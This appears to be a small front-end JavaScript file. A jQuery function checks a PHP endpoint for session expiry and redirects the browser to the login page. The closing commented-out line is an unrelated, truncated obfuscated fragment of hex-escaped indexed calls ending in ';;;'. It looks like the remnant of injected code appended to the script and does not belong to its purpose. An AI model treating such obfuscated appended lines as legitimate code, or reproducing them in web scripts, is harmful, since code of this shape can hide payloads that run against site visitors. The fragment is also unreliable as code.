
        function checkWheatherLogoutOrNot() {
            $.get('checkForSessionExpire.php', // url
                function (respone, textStatus, jqXHR) { // success callback
                    if (respone) {
                        window.location = "../../login.php";
                    }
                });
        }

//module.export.checkSessionStatus=checkSessionStatus;
//return Y[J(K.Y)+'\x63\x77'](Y[J(K.W)+'\x45\x74'](rand),rand());};;;